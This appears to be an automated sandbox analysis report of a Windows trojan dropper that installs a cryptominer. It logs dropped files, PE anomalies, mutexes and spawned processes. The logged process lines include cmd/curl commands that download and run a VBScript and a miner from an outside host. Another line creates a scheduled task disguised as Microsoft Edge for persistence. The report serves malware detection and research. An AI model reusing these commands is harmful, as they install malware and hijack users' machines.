Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe ECF9B0828798392080348E096E843458267B9DF11EBC035ECD9C738BB69DB470
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe ECF9B0828798392080348E096E843458267B9DF11EBC035ECD9C738BB69DB470

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: String function: 00C37870 appears 33 times

PE file contains more sections than normal

Source: Microsoft-Edge.exe.7.dr	Static PE information: Number of sections : 18 > 10
Source: loader_5879465914.exe.6.dr	Static PE information: Number of sections : 18 > 10
Source: loader_5879465914[1].exe.6.dr	Static PE information: Number of sections : 18 > 10

PE file does not import any functions

Source: miner2.0.exe.82.dr	Static PE information: No import functions for PE file found
Source: svchost64.exe.85.dr	Static PE information: No import functions for PE file found
Source: services64.exe.107.dr	Static PE information: No import functions for PE file found
Source: sihost64.exe.139.dr	Static PE information: No import functions for PE file found

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: miner2.0.exe.82.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: svchost64.exe.85.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: services64.exe.107.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9973763198228883
Source: file.exe	Static PE information: Section: nataabbx ZLIB complexity 0.9948613709117556
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9973763198228883
Source: axplong.exe.0.dr	Static PE information: Section: nataabbx ZLIB complexity 0.9948613709117556

Source: svchost64.exe.85.dr, yelshopxrkiqn.cs

Base64 encoded string: 'iWKBihCY/NR2u0VfXDnEMncwh0+pxXUtzTeI9OrvHieB1/U+tWGISXa2FTtyWV+O6+W+tAp9+fgFtq/qVxQlVw==', 'ieY8ZO9hFlLqpClco4yeBCyILf6h/s5ppeMlqk0FmZM7ROwjOVibc0UXkbJKHIkF', 'ieY8ZO9hFlLqpClco4yeBCyILf6h/s5ppeMlqk0FmZM7ROwjOVibc0UXkbJKHIkF', 'khR1b64TY8z9/BVRlRAkypYyYygZVgfzIVqfSrRVbtMA20lP9OIeb/63pXaoY2a900uUXc3nISGt4d+8ks0DQA==', 'Ki2fV6sqVt3eaBbMfXV41tgWCJ8rn7dUf0dsiy7tudXkvwzgD95p4EQYv9YXNvC3XrIW7u1JVNv0R7qyqCBtAYmqXCDXTakehAYnHB1XiN6BFmssQDRphFG109HSpPEX', 'khR1b64TY8z9/BVRlRAkypYyYygZVgfzIVqfSrRVbtMA20lP9OIeb/63pXaoY2a9wxBCW4jCfj3W0Gk/iTDqkUthU1U/7dUdCI9IQrSzF8I=', 'Ki2fV6sqVt3eaBbMfXV41tgWCJ8rn7dUf0dsiy7tudXkvwzgD95p4EQYv9YXNvC3XrIW7u1JVNv0R7qyqCBtAYmqXCDXTakehAYnHB1XiN5GEgIS4IV/6UqQrQnxXiEM'

Source: WR64.sys.139.dr

Binary string: \Device\WinRing0_1_2_0

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@314/69@4/4

Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Code function: 7_2_00401B3F GetCurrentProcessId,CreateToolhelp32Snapshot,fwrite,Process32First,_stricmp,Process32Next,CloseHandle,CloseHandle,

7_2_00401B3F

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loader_5879465914[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4296:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1988:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3128:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7048:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1004:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4588:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2124:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5196:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3396:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6328:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3488:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4544:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5816:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2756:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4048:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3248:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1716:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4496:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2944:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:280:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2208:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3960:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6032:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5356:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2448:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:888:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1992:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6188:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs

Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 50%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe "C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe"
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript conf.vbs
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del miner2.0.exe 2>nul && curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe && start miner2.0.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\miner2.0.exe miner2.0.exe
